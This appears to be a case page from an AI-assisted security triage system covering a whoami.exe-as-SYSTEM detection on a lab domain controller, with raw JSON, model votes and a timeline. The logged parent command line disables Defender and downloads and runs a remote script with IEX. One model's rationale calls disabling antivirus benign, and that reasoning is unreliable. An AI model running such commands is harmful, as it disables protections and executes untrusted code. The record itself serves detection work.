โ
Case #493
service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process
๐ท๏ธ Analyst Verdict Classification
SUSPICIOUS by analyst๐ค AI Analysis
๐ Detections (1)
Whoami.EXE Execution From Privileged Process
high
Rule: service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 82% ยท Verdict: suspicious
Event Data:
COMMAND_LINE:
"C:\Windows\system32\whoami.exe"
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\system32\whoami.exe
HASH:
1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a
MEMORY_USAGE:
32768
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
9048
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'file_path', 'value': 'C:\\Windows\\system32\\whoami.exe'}
{'type': 'hash', 'value': '1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a'}
MITRE:
T1056.001
T1056.002
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
"cat": "Whoami.EXE Execution From Privileged Process",
"detect": {
"event": {
"COMMAND_LINE": "\"C:\\Windows\\system32\\whoami.exe\"",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\system32\\whoami.exe",
"HASH": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
"MEMORY_USAGE": 32768,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 9048,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
"event_time": 1774364762339,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1500,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "21a8a6a7b8dd3620e299741b69c2a85b"
}
},
"detect_id": "4d4fc804-0031-4182-8f3e-913369c2a85b",
"detect_mtd": {
"author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov",
"description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors",
"falsepositives": [
"Unknown"
],
"level": "high",
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/"
],
"tags": [
"attack.privilege-escalation",
"attack.discovery",
"attack.t1033"
]
},
"gen_time": 1774364763842,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=21a8a6a7b8dd3620e299741b69c2a85b",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
"event_time": 1774364762339,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1500,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "21a8a6a7b8dd3620e299741b69c2a85b"
},
"rule_tags": [
"ext:ext-sigma",
"attack.privilege-escalation",
"attack.discovery",
"attack.t1033"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process",
"ts": 1774364764000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 3,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.825,
"false_positive_reason": "whoami.exe is a legitimate Windows system binary running from its expected location with valid Microsoft signature. The parent process PowerShell is executing administrative commands that include disabling real-time monitoring, which is consistent with management or testing scenarios rather than malicious activity.",
"investigation_questions": [
"What is the purpose of disabling real-time monitoring via Set-MpPreference?",
"Is this PowerShell execution part of a scheduled maintenance task or automated testing framework?",
"Has this user account been granted administrative privileges recently?"
],
"ioc_analysis": "whoami.exe is a legitimate Windows utility located in C:\\Windows\\system32\\. The hash matches the known Microsoft signature for this binary, and it is properly signed. While whoami can be used for reconnaissance, its execution from a high-privilege process (SYSTEM) by PowerShell running administrative commands indicates a likely management or testing activity rather than malicious intent.",
"iocs_extracted": [
{
"type": "file_path",
"value": "C:\\Windows\\system32\\whoami.exe"
},
{
"type": "hash",
"value": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a"
}
],
"mitre_techniques": [
"T1056.001",
"T1056.002"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Verify the parent process PowerShell command line for legitimate administrative tasks",
"Monitor for subsequent suspicious processes spawned by this session",
"Document the event as a known false positive in the SIEM"
],
"risk_score": 38,
"severity": "high",
"summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThe detection of whoami.exe execution from a privileged process is flagged as benign because the binary is running from its expected system location and is Microsoft-signed. The parent process PowerShell is executing legitimate administrative commands including disabling real-time monitoring, which suggests a management or testing scenario rather than active exploitation.\n\n**IOC Analysis:** whoami.exe is a legitimate Windows utility located in C:\\Windows\\system32\\. The hash matches the known Microsoft signature for this binary, and it is properly signed. While whoami can be used for reconnaissance, its execution from a high-privilege process (SYSTEM) by PowerShell running administrative commands indicates a likely management or testing activity rather than malicious intent.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a whoami.exe execution from a privileged process, which is a legitimate Windows tool but may indicate reconnaissance. The parent process is PowerShell running suspicious scripts for Atomic Red Team, suggesting potential malicious intent.\n\n**IOC Analysis:** FILE_PATH: C:\\Windows\\system32\\whoami.exe is a legitimate Windows command-line utility for account discovery. HASH: 1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a is a known Microsoft-signed binary, making it likely benign. However, the execution context from a SYSTEM user and the parent process\u0027s suspicious script for Atomic Red Team installation raises concerns, indicating possible reconnaissance or privilege escalation attempts.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: false_positive (low, 95% confidence)",
"deepseek-r1:8b: suspicious (medium, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "false_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Process Tree Investigation: 75 events found | ||
| recommended | executed | Process Tree Investigation: 75 events found | ||
| recommended | executed | General Activity Sweep: 0 events found |
๐ Add Note
๐ฌ Notes (5)
๐ค FusionSOC AI
2026-03-24T15:52
๐ค FusionSOC AI
2026-03-24T15:52
๐ค FusionSOC AI
2026-03-24T15:52
๐ค FusionSOC AI
2026-03-24T15:52
๐ค FusionSOC AI
2026-03-24T15:52
๐ Timeline
2026-03-24T16:04:25
analyst
Status changed: investigating โ closed
2026-03-24T16:04:23
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:52:25
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:52:25
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:52:25
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Document the event as a known false positive in the SIEM **Sensor:** `e4a1c62d-4...
2026-03-24T15:52:25
FusionSOC
Response action queued: recommended on Document the event as a known false positive in the SIEM
2026-03-24T15:52:25
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:52:25
FusionSOC
Action recommended โ executed: Process Tree Investigation: 75 events found
2026-03-24T15:52:25
FusionSOC AI
Note by FusionSOC AI: ## ๐ Process Tree Investigation **Action:** Monitor for subsequent suspicious processes spawned by this session **Sensor...
2026-03-24T15:52:25
FusionSOC
Response action queued: recommended on Monitor for subsequent suspicious processes spawned by this session
2026-03-24T15:52:25
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T15:52:25
FusionSOC
Action recommended โ executed: Process Tree Investigation: 75 events found
2026-03-24T15:52:25
FusionSOC AI
Note by FusionSOC AI: ## ๐ Process Tree Investigation **Action:** Verify the parent process PowerShell command line for legitimate administrat...
2026-03-24T15:52:24
FusionSOC
Response action queued: recommended on Verify the parent process PowerShell command line for legitimate administrative tasks
2026-03-24T15:52:24
FusionSOC AI
Status changed: open โ investigating
2026-03-24T15:52:24
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T15:52:24
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Manual analyst review required โ AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:52:24
FusionSOC
Response action queued: recommended on Manual analyst review required โ AI models (split)
2026-03-24T15:52:24
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:52:24
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:52:23
FusionSOC AI
Detection 4d4fc804-0031-4182-8f3e-913369c2a85b triaged as suspicious (high severity, confidence: 82%)
2026-03-24T15:52:23
FusionSOC AI
Case created from detection: service.windows_process_creation/proc_creation_win_whoami_execution_from_high_priv_process